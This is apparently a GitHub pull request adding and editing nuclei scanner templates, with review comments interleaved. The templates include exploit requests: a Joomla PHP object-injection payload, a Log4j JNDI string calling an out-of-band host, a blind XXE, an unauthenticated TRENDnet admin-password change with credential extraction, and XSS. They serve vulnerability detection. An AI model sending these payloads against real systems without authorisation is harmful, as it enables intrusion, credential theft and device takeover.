Merge pull request #3 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2022-02-05 23:41:24 +05:30 committed by GitHub
commit 0d146b2a49
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
24 changed files with 547 additions and 16 deletions


@ -5,16 +5,19 @@ info:
author: dhiyaneshDK
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
remediation: Upgrade to a supported version of Gog.
reference:
- http://www.securityfocus.com/bid/71187
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- http://gogs.io/docs/intro/change_log.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
- http://www.exploit-db.com/exploits/35238
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
- http://www.securityfocus.com/archive/1/533995/100/0/threaded
tags: cve,cve2014,sqli,gogs
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2014-8682
cwe-id: CWE-89
metadata:
shodan-query: 'title:"Sign In - Gogs"'
@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/01
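Review bot: The new `remediation: Upgrade to a supported version of Gog.` line in the first hunk misspells the product name and is vaguer than the description, which already names the fixed release. `remediation: Upgrade to Gogs 0.5.6.1105 Beta or a later supported release.` states the same advice correctly and gives operators a concrete version to check against. Both hunks of this section are complete within view; the second only adds the enhancement comment.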


@ -30,3 +30,4 @@ requests:
- type: status
status:
- 200
- 500
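Review bot: Adding `- 500` to the status matcher means a generic server error on the probe path now satisfies this matcher; whether that turns into a false positive depends on the sibling matchers and `matchers-condition` above the hunk, which are outside the visible lines. If a 500 is the response the vulnerable build actually returns, a comment such as `# vulnerable builds answer this probe with 500` records why the error status is accepted. The same addition appears in the later hunk `@ -31,3 +31,4 @@ requests:` and the same note applies there.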


@ -1,7 +1,7 @@
id: CVE-2018-17254
info:
name: Joomla JCK Editor SQL Injection
name: Joomla! JCK Editor SQL Injection
author: Suman_Kar
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
severity: critical
@ -27,3 +27,5 @@ requests:
part: body
words:
- "nuclei-template"
# Enhanced by cs on 2022/02/01


@ -31,3 +31,4 @@ requests:
- type: status
status:
- 200
- 500


@ -0,0 +1,31 @@
id: CVE-2020-36365
info:
name: Smartstore < 4.1.0 - Open redirect
author: 0x_Akoko
severity: medium
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
reference:
- https://github.com/smartstore/SmartStoreNET/issues/2113
- https://www.cvedetails.com/cve/CVE-2020-36365
- https://github.com/smartstore/SmartStoreNET
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-36365
cwe-id: CWE-601
metadata:
shodan-query: http.html:'content="Smartstore'
tags: cve,cve2020,redirect,smartstore
requests:
- method: GET
path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
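Review bot: The probed endpoint `/backend/admin/common/clearcache` is, by name, a state-changing action, yet `tags: cve,cve2020,redirect,smartstore` omits `intrusive`, the tag this same PR applies to the TEW-827DRU password-change template; if the cache is cleared before the redirect is issued, operators excluding intrusive templates would still run it. Either extend the line to `tags: cve,cve2020,redirect,smartstore,intrusive`, or, if it is known that the redirect happens without the action executing, say so in `description`. The description also names three other affected actions; a short note that only the ClearCache redirect is exercised would make the template's coverage explicit.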


@ -0,0 +1,54 @@
id: CVE-2021-20150
info:
name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
author: gy741
severity: medium
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 5.30
cve-id: CVE-2021-20150
cwe-id: CWE-287
metadata:
shodan-query: http.html:"TEW-827DRU"
tags: cve,cve2021,trendnet,disclosure,router
requests:
- raw:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'ftp_username'
- 'ftp_password'
- 'ftp_permission'
- 'TEW-827DRU'
condition: and
- type: word
part: header
words:
- "text/html"
extractors:
- type: regex
part: body
name: password
group: 1
regex:
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
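Review bot: `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` and `cvss-score: 5.30` contradict each other: that vector evaluates to 9.8, and it is the same vector the sibling CVE-2021-20158 template pairs with 9.80, so either the vector was copied across from that template or the score is wrong, and `severity: medium` only fits the latter. Please re-check against the NVD reference already listed in this template and correct whichever field is off. Separately, the extractor named `password` writes the recovered admin credential into scan output; since the word matchers already confirm the disclosure, consider whether the extractor is needed, or flag in `description` that results contain credentials so report handling can account for it.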


@ -0,0 +1,51 @@
id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-20158
cwe-id: CWE-287
metadata:
shodan-query: http.html:"TEW-827DRU"
tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos
requests:
- raw:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'setConnectDevice'
- 'setInternet'
- 'setWlanSSID'
- 'TEW-827DRU'
condition: and
- type: word
part: header
words:
- "text/html"
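Review bot: The second reference `https://nvd.nist.gov/vuln/detail/CVE-2021-20150` points at the other Trendnet CVE rather than this template's own `cve-id: CVE-2021-20158`; it should read `- https://nvd.nist.gov/vuln/detail/CVE-2021-20158`. In `description`, `malicous` should be `malicious`. The tag `disclosure` describes the sibling CVE-2021-20150 template, not an unauthenticated password change; `intrusive` and `dos` are the tags that fit the behaviour here, so `tags: cve,cve2021,trendnet,router,intrusive,dos` would be more accurate.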


@ -0,0 +1,36 @@
id: CVE-2021-32853
info:
name: Erxes <= v0.23.0 XSS
author: dwisiswant0
severity: medium
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
metadata:
shodan-query: http.title:"erxes"
tags: cve,cve2021,xss,erxes,oss
requests:
- method: GET
path:
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'topic_id: "</script><script>alert(document.domain)</script>'
- "window.erxesEnv"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
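Review bot: The reference `https://nvd.nist.gov/vuln/detail/CVE-2021-3285` drops the final digit of the template's own `id: CVE-2021-32853` and therefore points at a different CVE; it should be `- https://nvd.nist.gov/vuln/detail/CVE-2021-32853`. The description is missing a space in `cross-site scripting.The value`. Unlike the other CVE templates added in this PR, there is no `classification` block (cvss-metrics, cvss-score, cve-id, cwe-id); adding one keeps the CVE templates consistent and lets tooling key on `cve-id`.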


@ -0,0 +1,27 @@
id: cisco-ucs-kvm-login
info:
name: Cisco UCS KVM Login
author: idealphase
severity: info
description: The KVM console is an interface accessible from the Cisco UCS Manager GUI or the KVM Launch Manager that emulates a direct KVM connection. Unlike the KVM dongle, which requires you to be physically connected to the server, the KVM console allows you to connect to the server from a remote location across the network.
reference: https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html
metadata:
shodan-query: 'http.title:"Cisco UCS KVM Direct"'
tags: panel,cisco,ucs,kvm
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Cisco UCS KVM Direct</title>'
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: jamf-panel
info:
name: JAMF MDM Panel
author: pdteam
severity: info
metadata:
shodan-query: http.favicon.hash:1262005940
tags: jamf,panel,mdm
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: all
words:
- "Jamf Pro Login"
- "Jamf Cloud Node"
condition: or


@ -1,7 +1,7 @@
id: joomla-panel
info:
name: Joomla Panel
name: Joomla! Panel
author: its0x08
severity: info
tags: panel,joomla
@ -16,3 +16,5 @@ requests:
- '<meta name="generator" content="Joomla! - Open Source Content Management" />'
- '/administrator/templates/isis/images/joomla.png'
condition: or
# Enhanced by cs on 2022/01/28


@ -0,0 +1,25 @@
id: trendnet-tew827dru-login
info:
name: TRENDnet TEW-827DRU Login
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"TEW-827DRU"
tags: panel,router,trendnet
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var model = "TEW-827DRU";'
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: wallix-accessmanager-panel
info:
name: Wallix Access Manager Panel
author: righettod
severity: info
reference: https://www.wallix.com/privileged-access-management/access-manager/
metadata:
shodan-query: http.title:"Wallix Access Manager"
tags: panel,wallix
requests:
- method: GET
path:
- '{{BaseURL}}/wabam'
- '{{BaseURL}}/wabam/favicon.ico'
stop-at-first-match: true
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains(tolower(body), '<title>wallix access manager</title>')"
condition: and
- type: dsl
dsl:
- "status_code==200"
- "('1745235488' == mmh3(base64_py(body)))"
condition: and


@ -2,9 +2,11 @@ id: manageengine-servicedesk
info:
name: ZOHO ManageEngine ServiceDesk
author: dhiyaneshDK
author: dhiyaneshDK,righettod
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
reference:
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22
tags: panel,zoho,manageengine
requests:
@ -17,6 +19,7 @@ requests:
- type: word
words:
- '<title>ManageEngine ServiceDesk Plus</title>'
- '<title>ManageEngine ServiceDesk Plus - MSP</title>'
- type: status
status:


@ -1,8 +1,8 @@
id: addeventlistener-detect
info:
name: AddEventlistener detection
author: yavolo
name: DOM EventListener detection
author: yavolo,dwisiswant0
severity: info
tags: xss,misc
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
@ -10,10 +10,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}'
- "{{BaseURL}}"
matchers:
- type: word
- type: regex
part: body
words:
- 'window.addEventListener('
regex:
- (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118
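Review bot: The new regex `(([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']?` fires on any listener registration (`click`, `load`, and so on), whereas the linked reference concerns `message` listeners as the DOM-XSS source of interest, so the rewrite is considerably noisier than the template name and `xss` tag suggest. If broad matching is intended, `description` should say so; otherwise constraining the event name, for example `\.?add[Ee]vent[Ll]istener\(["']?message["']?`, keeps the detection aligned with its purpose. `\_` inside `[\w\_]` is redundant because `\w` already includes the underscore, so `\w+` is equivalent and easier to read. The first hunk of this section changes only the name and author.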


@ -0,0 +1,25 @@
id: erxes-detect
info:
name: Erxes Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"erxes"
tags: tech,erxes
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "<title>erxes(.*)</title>"
- type: status
status:
- 200


@ -0,0 +1,34 @@
id: smartstore-detect
info:
name: SmartStore Detect
author: princechaddha
severity: info
reference: https://github.com/smartstore/SmartStoreNET
metadata:
shodan-query: http.html:'content="Smartstore'
tags: tech,smartstore,oos
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<meta name="generator" content="Smartstore (.*)" />'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<meta name="generator" content="Smartstore (.*)" />'
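Review bot: `tags: tech,smartstore,oos` looks like a typo for `oss`, the tag the Erxes CVE template in this same PR uses; a misspelled tag is silently never selected or excluded by tag filters. Change it to `tags: tech,smartstore,oss`. The extractor reuses the matcher's `(.*)` group to report the version, which is fine, but a `# version captured from the generator meta tag` comment on the extractor would make the duplicated regex self-explanatory.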


@ -2,7 +2,7 @@ id: telerik-dialoghandler-detect
info:
name: Detect Telerik Web UI Dialog Handler
author: organiccrap,zhenwarx
author: organiccrap,zhenwarx,nielsing
severity: info
reference:
- https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
@ -28,6 +28,7 @@ requests:
- '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1'
stop-at-first-match: true
matchers-condition: and


@ -0,0 +1,50 @@
id: jamf-blind-xxe
info:
name: JAMF Blind XXE / SSRF
author: pdteam
severity: medium
reference: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
tags: xxe,ssrf,jamf
requests:
- raw:
- |
POST /client HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version='1.0' encoding='UTF-8' standalone="no"?>
<!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
<ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
<device>
<uuid>&test;</uuid>
<macAddresses />
</device>
<application>com.jamfsoftware.jamfdistributionserver</application>
<messageTimestamp>{{unix_time()}}</messageTimestamp>
<content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
<uuid>00000000-0000-0000-0000-000000000000</uuid>
<commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
<status>
<code>1999</code>
<timestamp>{{unix_time()}}</timestamp>
</status>
<commandData>
<distributionServerInventory>
<ns2:distributionServerID>34</ns2:distributionServerID>
</distributionServerInventory>
</commandData>
</content>
</ns2:jamfMessage>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: word
words:
- "com.jamfsoftware.jss"
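Review bot: The inline comment `# Confirms the DNS Interaction` on `part: interactsh_protocol` contradicts the matcher, whose word list is `"http"`: the expected callback is the HTTP fetch of the external DTD named in the DOCTYPE, not a DNS lookup. Change it to `part: interactsh_protocol # Confirms the HTTP interaction (external DTD fetched)` so the comment matches what is asserted; the log4j template in this PR uses the same comment with `"dns"`, where it is correct. A short `description` stating that the check is blind (out-of-band callback only) would also help readers who see `severity: medium` on an XXE template.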


@ -0,0 +1,38 @@
id: jamf-log4j-jndi-rce
info:
name: JAMF Log4j JNDI RCE
author: pdteam
severity: critical
reference: https://github.com/random-robbie/jamf-log4j
tags: rce,jndi,log4j,jamf
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output


@ -0,0 +1,43 @@
id: rusty-joomla
info:
name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS
author: leovalcante,kiks7
severity: critical
description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution.
reference:
- https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/
- https://github.com/kiks7/rusty_joomla_rce
tags: joomla,rce,unauth,php,cms,objectinjection
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1
redirects: true
max-redirects: 2
cookie-reuse: true
extractors:
- type: regex
name: csrf
part: body
internal: true
group: 1
regex:
- "<input type=\"hidden\" name=\"([0-9a-z]{32})\" value=\"1\""
matchers:
- type: word
words:
- "http://rusty.jooml/;pkwxhxqxmdkkmscotwvh"
- "Failed to decode session object"
condition: and


@ -0,0 +1,28 @@
id: antsword-backdoor
info:
name: Antsword backdook
author: ffffffff0x
severity: critical
description: 蚁剑「绕过 disable_functions」插件生成的 shell
reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9
tags: backdoor,antsword
requests:
- method: POST
path:
- "{{BaseURL}}/.antproxy.php"
headers:
Content-Type: application/x-www-form-urlencoded
body: 'ant=echo md5("antproxy.php");'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "951d11e51392117311602d0c25435d7f"
- type: status
status:
- 200
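Review bot: `name: Antsword backdook` has a typo; `name: AntSword backdoor` matches the `id` and tags. The `description` is written in Chinese while the rest of the repository's templates are in English; an English equivalent grounded in the request is `description: Detects a web shell (.antproxy.php) generated by the AntSword "bypass disable_functions" plugin.` A comment on the `words` entry noting that the value is the MD5 of the echoed string would save the next reader from reverse-engineering the hex constant.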


@ -0,0 +1,16 @@
id: deadbolt-ransomware
info:
name: Deadbolt Ransomware Detection
author: pdteam
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT.</title>"
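Review bot: This template has no `tags:`, so unlike every other template in this PR it cannot be included or excluded by tag-based selection; `tags: ransomware,deadbolt` would follow the repo convention. It also lacks a `description` and `reference`, so a hit on the `<title>` string gives an operator no context for what the page represents or where to read more; a one-line description of the matched ransom-note page and a link to a public write-up would fit the other templates here. The word matcher has no `part:`, which relies on the default; adding `part: body` makes the intent explicit.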


@ -1,7 +1,7 @@
id: joomla-workflow
info:
name: Joomla Security Checks
name: Joomla! Security Checks
author: daffainfo
description: A simple workflow that runs all Joomla related nuclei templates on a given target.
@ -10,4 +10,4 @@ workflows:
matchers:
- name: joomla
subtemplates:
- tags: joomla
- tags: joomla